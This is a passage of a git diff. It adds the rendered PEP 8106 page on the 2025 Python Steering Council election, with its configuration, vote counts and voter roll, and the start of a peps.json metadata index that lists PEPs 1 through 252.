While this file is not public as it contains private email addresses, the +Complete Voter Roll is available with a list of all eligible voters by name.

+
+
+

Election Implementation

+

The election was conducted using the Helios Voting Service.

+
+

Configuration

+

Short name: 2025-python-steering-council

+

Name: 2025 Python Steering Council Election

+

Description: Election for the Python steering council, as specified in PEP 13. This is steering council election for the 2025 term.

+

type: Election

+

Use voter aliases: [X]

+

Randomize answer order: [X]

+

Private: [X]

+

Help Email Address: psf-election@python.org

+

Voting starts at: November 25, 2024 12:00 UTC

+

Voting ends at: December 10, 2024 12:00 UTC

+

This will create an election in which:

+
    +
  • Voting is not open to the public, only those on the Voter Roll may +participate. Ballots will be emailed when voting starts.
  • +
  • Candidates are presented in random order, to help avoid bias.
  • +
  • Voter identities and ballots are protected against cryptographic advances.
  • +
+
+
+

Questions

+
+

Question 1

+

Select between 0 and - (approval) answers. Result Type: absolute

+

Question: Select candidates for the Python Steering Council

+

Answer #1 - #N: Candidates from Candidates_ Section

+
+
+
+
+

Results

+

Of 100 eligible voters, 76 cast ballots.

+

The top five vote-getters are:

+
    +
  • Barry Warsaw
  • +
  • Donghee Na
  • +
  • Emily Morehouse
  • +
  • Gregory P. Smith
  • +
  • Pablo Galindo Salgado
  • +
+

No conflict of interest as defined in PEP 13 were observed.

+

The full vote counts are as follows:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
CandidateVotes Received
Barry Warsaw58
Donghee Na48
Emily Morehouse52
Ethan Furman31
Gregory P. Smith50
Mariatta23
Pablo Galindo Salgado63
Thomas Wouters38
+
+ +
+

Complete Voter Roll

+
+

Active Python core developers

+
Adam Turner
+Alex Gaynor
+Alex Waygood
+Alexander Belopolsky
+Alyssa Coghlan
+Ammar Askar
+Andrew Svetlov
+Antoine Pitrou
+Barney Gale
+Barry Warsaw
+Batuhan Taskaya
+Benjamin Peterson
+Berker Peksağ
+Brandt Bucher
+Brett Cannon
+Brian Curtin
+C.A.M. Gerlach
+CF Bolz-Tereick
+Carl Meyer
+Carol Willing
+Cheryl Sabella
+Chris Withers
+Christian Heimes
+Dennis Sweeney
+Dino Viehland
+Donghee Na
+Emily Morehouse
+Éric Araujo
+Eric Snow
+Eric V. Smith
+Erlend Egeberg Aasland
+Ethan Furman
+Ezio Melotti
+Facundo Batista
+Filipe Laíns
+Fred Drake
+Georg Brandl
+Giampaolo Rodolà
+Gregory P. Smith
+Guido van Rossum
+Hugo van Kemenade
+Hynek Schlawack
+Inada Naoki
+Irit Katriel
+Ivan Levkivskyi
+Jack Jansen
+Jason R. Coombs
+Jelle Zijlstra
+Jeremy Hylton
+Jeremy Kloth
+Jesús Cea
+Joannah Nanjekye
+Julien Palard
+Karthikeyan Singaravelan
+Ken Jin
+Kirill Podoprigora
+Kumar Aditya
+Kurt B. Kaiser
+Kushal Das
+Kyle Stanley
+Larry Hastings
+Łukasz Langa
+Lysandros Nikolaou
+Marc-André Lemburg
+Mariatta
+Mark Shannon
+Matt Page
+Michael Droettboom
+Nathaniel J. Smith
+Ned Batchelder
+Ned Deily
+Neil Schemenauer
+Nikita Sobolev
+Pablo Galindo
+Paul Ganssle
+Paul Moore
+Petr Viktorin
+Pradyun Gedam
+R. David Murray
+Raymond Hettinger
+Ronald Oussoren
+Russell Keith-Magee
+Sam Gross
+Savannah Ostrowski
+Senthil Kumaran
+Serhiy Storchaka
+Shantanu Jain
+Stefan Behnel
+Steve Dower
+Stéphane Wirtel
+Tal Einat
+Terry Jan Reedy
+Thomas Wouters
+Tian Gao
+Tim Golden
+Tim Peters
+Victor Stinner
+Vinay Sajip
+Yury Selivanov
+Zachary Ware
+
+
+ +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8106.rst

+

Last modified: 2024-12-10 12:30:28 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/peps.json b/peps.json new file mode 100644 index 00000000000..c7ca20cfcf1 --- /dev/null +++ b/peps.json @@ -0,0 +1,11375 @@ +{ + "1": { + "number": 1, + "title": "PEP Purpose and Guidelines", + "authors": "Barry Warsaw, Jeremy Hylton, David Goodger, Alyssa Coghlan", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "13-Jun-2000", + "python_version": null, + "post_history": "21-Mar-2001, 29-Jul-2002, 03-May-2003, 05-May-2012, 07-Apr-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0001/" + }, + "2": { + "number": 2, + "title": "Procedure for Adding New Modules", + "authors": "Brett Cannon, Martijn Faassen", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "07-Jul-2001", + "python_version": null, + "post_history": "07-Jul-2001, 09-Mar-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0002/" + }, + "3": { + "number": 3, + "title": "Guidelines for Handling Bug Reports", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "25-Sep-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0003/" + }, + "4": { + "number": 4, + "title": "Deprecation of Standard Modules", + "authors": "Brett Cannon, Martin von L\u00f6wis", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "01-Oct-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0004/" + }, + "5": { + "number": 5, + "title": "Guidelines for Language Evolution", + "authors": "Paul Prescod", + "discussions_to": null, + "status": "Superseded", + "type": "Process", + "topic": "", + "created": "26-Oct-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "387", + "url": "https://peps.python.org/pep-0005/" + }, + "6": { + "number": 6, + "title": "Bug Fix Releases", + "authors": "Aahz, Anthony Baxter", + "discussions_to": null, + "status": "Superseded", + "type": "Process", + "topic": "", + "created": "15-Mar-2001", + "python_version": null, + "post_history": "15-Mar-2001, 18-Apr-2001, 19-Aug-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0006/" + }, + "7": { + "number": 7, + "title": "Style Guide for C Code", + "authors": "Guido van Rossum, Barry Warsaw", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "05-Jul-2001", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0007/" + }, + "8": { + "number": 8, + "title": "Style Guide for Python Code", + "authors": "Guido van Rossum, Barry Warsaw, Alyssa Coghlan", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "05-Jul-2001", + "python_version": null, + "post_history": "05-Jul-2001, 01-Aug-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0008/" + }, + "9": { + "number": 9, + "title": "Sample Plaintext PEP Template", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "14-Aug-2001", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/2YMHVPRDWGQLA5A2FKXE2JMLM2HQEEGW/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0009/" + }, + "10": { + "number": 10, + "title": "Voting Guidelines", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "07-Mar-2002", + "python_version": null, + "post_history": "07-Mar-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0010/" + }, + "11": { + "number": 11, + "title": "CPython platform support", + "authors": "Martin von L\u00f6wis, Brett Cannon", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "07-Jul-2002", + "python_version": null, + "post_history": "`18-Aug-2007 `__, `14-May-2014 `__, `20-Feb-2015 `__, `10-Mar-2022 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0011/" + }, + "12": { + "number": 12, + "title": "Sample reStructuredText PEP Template", + "authors": "David Goodger, Barry Warsaw, Brett Cannon", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "05-Aug-2002", + "python_version": null, + "post_history": "`30-Aug-2002 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0012/" + }, + "13": { + "number": 13, + "title": "Python Language Governance", + "authors": "The Python core team and community", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "governance", + "created": "16-Dec-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0013/" + }, + "20": { + "number": 20, + "title": "The Zen of Python", + "authors": "Tim Peters", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "19-Aug-2004", + "python_version": null, + "post_history": "22-Aug-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0020/" + }, + "42": { + "number": 42, + "title": "Feature Requests", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "12-Sep-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0042/" + }, + "100": { + "number": 100, + "title": "Python Unicode Integration", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Mar-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0100/" + }, + "101": { + "number": 101, + "title": "Doing Python Releases 101", + "authors": "Barry Warsaw, Guido van Rossum", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "22-Aug-2001", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": "102", + "superseded_by": null, + "url": "https://peps.python.org/pep-0101/" + }, + "102": { + "number": 102, + "title": "Doing Python Micro Releases", + "authors": "Anthony Baxter, Barry Warsaw, Guido van Rossum", + "discussions_to": null, + "status": "Superseded", + "type": "Informational", + "topic": "", + "created": "09-Jan-2002", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "101", + "url": "https://peps.python.org/pep-0102/" + }, + "103": { + "number": 103, + "title": "Collecting information about git", + "authors": "Oleg Broytman", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "01-Jun-2015", + "python_version": null, + "post_history": "12-Sep-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0103/" + }, + "160": { + "number": 160, + "title": "Python 1.6 Release Schedule", + "authors": "Fred L. Drake, Jr.", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "25-Jul-2000", + "python_version": "1.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0160/" + }, + "200": { + "number": 200, + "title": "Python 2.0 Release Schedule", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "12-Jul-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0200/" + }, + "201": { + "number": 201, + "title": "Lockstep Iteration", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Jul-2000", + "python_version": "2.0", + "post_history": "27-Jul-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0201/" + }, + "202": { + "number": 202, + "title": "List Comprehensions", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Jul-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0202/" + }, + "203": { + "number": 203, + "title": "Augmented Assignments", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Jul-2000", + "python_version": "2.0", + "post_history": "14-Aug-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0203/" + }, + "204": { + "number": 204, + "title": "Range Literals", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "14-Jul-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0204/" + }, + "205": { + "number": 205, + "title": "Weak References", + "authors": "Fred L. Drake, Jr.", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-Jul-2000", + "python_version": "2.1", + "post_history": "11-Jan-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0205/" + }, + "206": { + "number": 206, + "title": "Python Advanced Library", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "14-Jul-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0206/" + }, + "207": { + "number": 207, + "title": "Rich Comparisons", + "authors": "Guido van Rossum, David Ascher", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "25-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0207/" + }, + "208": { + "number": 208, + "title": "Reworking the Coercion Model", + "authors": "Neil Schemenauer, Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-Dec-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0208/" + }, + "209": { + "number": 209, + "title": "Multi-dimensional Arrays", + "authors": "Paul Barrett, Travis Oliphant", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "03-Jan-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0209/" + }, + "210": { + "number": 210, + "title": "Decoupling the Interpreter Loop", + "authors": "David Ascher", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "15-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0210/" + }, + "211": { + "number": 211, + "title": "Adding A New Outer Product Operator", + "authors": "Greg Wilson", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "15-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0211/" + }, + "212": { + "number": 212, + "title": "Loop Counter Iteration", + "authors": "Peter Schneider-Kamp", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "22-Aug-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0212/" + }, + "213": { + "number": 213, + "title": "Attribute Access Handlers", + "authors": "Paul Prescod", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "21-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0213/" + }, + "214": { + "number": 214, + "title": "Extended Print Statement", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Jul-2000", + "python_version": "2.0", + "post_history": "16-Aug-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0214/" + }, + "215": { + "number": 215, + "title": "String Interpolation", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "24-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "292", + "url": "https://peps.python.org/pep-0215/" + }, + "216": { + "number": 216, + "title": "Docstring Format", + "authors": "Moshe Zadka", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "31-Jul-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "287", + "url": "https://peps.python.org/pep-0216/" + }, + "217": { + "number": 217, + "title": "Display Hook for Interactive Use", + "authors": "Moshe Zadka", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "31-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0217/" + }, + "218": { + "number": 218, + "title": "Adding a Built-In Set Object Type", + "authors": "Greg Wilson, Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "31-Jul-2000", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0218/" + }, + "219": { + "number": 219, + "title": "Stackless Python", + "authors": "Gordon McMillan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "14-Aug-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0219/" + }, + "220": { + "number": 220, + "title": "Coroutines, Generators, Continuations", + "authors": "Gordon McMillan", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "14-Aug-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0220/" + }, + "221": { + "number": 221, + "title": "Import As", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Aug-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0221/" + }, + "222": { + "number": 222, + "title": "Web Library Enhancements", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "18-Aug-2000", + "python_version": "2.1", + "post_history": "22-Dec-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0222/" + }, + "223": { + "number": 223, + "title": "Change the Meaning of ``\\x`` Escapes", + "authors": "Tim Peters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Aug-2000", + "python_version": "2.0", + "post_history": "23-Aug-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0223/" + }, + "224": { + "number": 224, + "title": "Attribute Docstrings", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "23-Aug-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0224/" + }, + "225": { + "number": 225, + "title": "Elementwise/Objectwise Operators", + "authors": "Huaiyu Zhu, Gregory Lielens", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "19-Sep-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0225/" + }, + "226": { + "number": 226, + "title": "Python 2.1 Release Schedule", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "16-Oct-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0226/" + }, + "227": { + "number": 227, + "title": "Statically Nested Scopes", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Nov-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0227/" + }, + "228": { + "number": 228, + "title": "Reworking Python's Numeric Model", + "authors": "Moshe Zadka, Guido van Rossum", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "04-Nov-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0228/" + }, + "229": { + "number": 229, + "title": "Using Distutils to Build Python", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Nov-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0229/" + }, + "230": { + "number": 230, + "title": "Warning Framework", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Nov-2000", + "python_version": "2.1", + "post_history": "05-Nov-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0230/" + }, + "231": { + "number": 231, + "title": "__findattr__()", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-Nov-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0231/" + }, + "232": { + "number": 232, + "title": "Function Attributes", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Dec-2000", + "python_version": "2.1", + "post_history": "20-Feb-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0232/" + }, + "233": { + "number": 233, + "title": "Python Online Help", + "authors": "Paul Prescod", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "11-Dec-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0233/" + }, + "234": { + "number": 234, + "title": "Iterators", + "authors": "Ka-Ping Yee, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jan-2001", + "python_version": "2.1", + "post_history": "30-Apr-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0234/" + }, + "235": { + "number": 235, + "title": "Import on Case-Insensitive Platforms", + "authors": "Tim Peters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "21-Feb-2001", + "python_version": "2.1", + "post_history": "16-Feb-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0235/" + }, + "236": { + "number": 236, + "title": "Back to the __future__", + "authors": "Tim Peters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Feb-2001", + "python_version": "2.1", + "post_history": "26-Feb-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0236/" + }, + "237": { + "number": 237, + "title": "Unifying Long Integers and Integers", + "authors": "Moshe Zadka, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2001", + "python_version": "2.2", + "post_history": "16-Mar-2001, 14-Aug-2001, 23-Aug-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0237/" + }, + "238": { + "number": 238, + "title": "Changing the Division Operator", + "authors": "Moshe Zadka, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2001", + "python_version": "2.2", + "post_history": "16-Mar-2001, 26-Jul-2001, 27-Jul-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0238/" + }, + "239": { + "number": 239, + "title": "Adding a Rational Type to Python", + "authors": "Christopher A. Craig, Moshe Zadka", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2001", + "python_version": "2.2", + "post_history": "16-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0239/" + }, + "240": { + "number": 240, + "title": "Adding a Rational Literal to Python", + "authors": "Christopher A. Craig, Moshe Zadka", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2001", + "python_version": "2.2", + "post_history": "16-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0240/" + }, + "241": { + "number": 241, + "title": "Metadata for Python Software Packages", + "authors": "A.M. Kuchling", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "12-Mar-2001", + "python_version": null, + "post_history": "`19-Mar-2001 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "314", + "url": "https://peps.python.org/pep-0241/" + }, + "242": { + "number": 242, + "title": "Numeric Kinds", + "authors": "Paul F. Dubois", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "17-Mar-2001", + "python_version": "2.2", + "post_history": "17-Apr-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0242/" + }, + "243": { + "number": 243, + "title": "Module Repository Upload Mechanism", + "authors": "Sean Reifschneider", + "discussions_to": "distutils-sig@python.org", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "18-Mar-2001", + "python_version": "2.1", + "post_history": "20-Mar-2001, 24-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0243/" + }, + "244": { + "number": 244, + "title": "The ``directive`` statement", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Mar-2001", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0244/" + }, + "245": { + "number": 245, + "title": "Python Interface Syntax", + "authors": "Michel Pelletier", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Jan-2001", + "python_version": "2.2", + "post_history": "21-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0245/" + }, + "246": { + "number": 246, + "title": "Object Adaptation", + "authors": "Alex Martelli, Clark C. Evans", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "21-Mar-2001", + "python_version": "2.5", + "post_history": "29-Mar-2001, 10-Jan-2005", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0246/" + }, + "247": { + "number": 247, + "title": "API for Cryptographic Hash Functions", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "23-Mar-2001", + "python_version": null, + "post_history": "20-Sep-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0247/" + }, + "248": { + "number": 248, + "title": "Python Database API Specification v1.0", + "authors": "Greg Stein, Marc-Andr\u00e9 Lemburg", + "discussions_to": "db-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "08-May-1996", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "249", + "url": "https://peps.python.org/pep-0248/" + }, + "249": { + "number": 249, + "title": "Python Database API Specification v2.0", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": "db-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "12-Apr-1999", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": "248", + "superseded_by": null, + "url": "https://peps.python.org/pep-0249/" + }, + "250": { + "number": 250, + "title": "Using site-packages on Windows", + "authors": "Paul Moore", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Mar-2001", + "python_version": "2.2", + "post_history": "30-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0250/" + }, + "251": { + "number": 251, + "title": "Python 2.2 Release Schedule", + "authors": "Barry Warsaw, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "17-Apr-2001", + "python_version": "2.2", + "post_history": "14-Aug-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0251/" + }, + "252": { + "number": 252, + "title": "Making Types Look More Like 